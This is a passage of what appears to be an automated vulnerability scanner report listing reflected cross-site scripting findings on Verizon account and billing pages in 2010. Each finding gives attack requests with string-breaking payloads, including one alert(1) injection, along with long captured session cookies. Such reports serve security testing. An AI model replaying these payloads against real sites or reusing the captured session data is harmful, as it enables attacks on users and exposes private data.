Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22735
Expires: Sat, 20 Nov 2010 02:33:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:33 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=Z%2bMP4OJFy5%2fqmvWNgdEqqq8jhZx46tHx; domain=.verizon.com; path=/


<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...
<!--.net shutdown -->
           
               locationHref = locationHref + "&Client=" + "MYVERb116d";alert(1)//c8e1f41e796"
           

           location.href = locationHref + catHref;
           var appname = navigator.appName;
           if(appname != "Netscape")
           {
           
            var tempHTML = document.getElementById(Ctrl1).innerHTML;
       
...[SNIP]...

2.843. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/MyAccount/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa60"%3bf05a0d1a8b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfa60";f05a0d1a8b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/MyAccount/?cfa60"%3bf05a0d1a8b6=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:48:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 128914

<!-- Vignette V6 Fri Nov 19 18:48:53 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
cument.cookie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/MyAccount/?cfa60";f05a0d1a8b6=1';
<!-- Vignette V6 Fri Nov 19 18:48:53 2010 -->
...[SNIP]...

2.844. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/billview/PfbPage.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9f30"%3b3e7ac830269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9f30";3e7ac830269 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/billview/PfbPage.aspx?d9f30"%3b3e7ac830269=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSQCTQBBS=AFAADPNBHJKOMNEGALNHDACA; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/
Content-Length: 128949

<!-- Vignette V6 Fri Nov 19 18:47:43 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
ie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/billview/PfbPage.aspx?d9f30";3e7ac830269=1';
<!-- Vignette V6 Fri Nov 19 18:47:43 2010 -->
...[SNIP]...

2.845. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/billview/PfbPage.aspx

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66264"%3b2d436cdd1d was submitted in the ref parameter. This input was echoed as 66264";2d436cdd1d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/billview/PfbPage.aspx?ref=BILLVIEW66264"%3b2d436cdd1d HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sun, 21 Nov 2010 18:06:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCQADSRDB=AHCADHMCFEJEKPMBDPDPKACJ; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660;path=/
Content-Length: 128860

<!-- Vignette V6 Sun Nov 21 10:06:22 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/billview/PfbPage.aspx?ref=BILLVIEW66264";2d436cdd1d';
<!-- Vignette V6 Sun Nov 21 10:06:22 2010 -->
...[SNIP]...

2.846. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/myaccount/Main/MyAccount.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbeb"%3b928f0315c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dbeb";928f0315c8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/myaccount/Main/MyAccount.aspx?1dbeb"%3b928f0315c8d=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
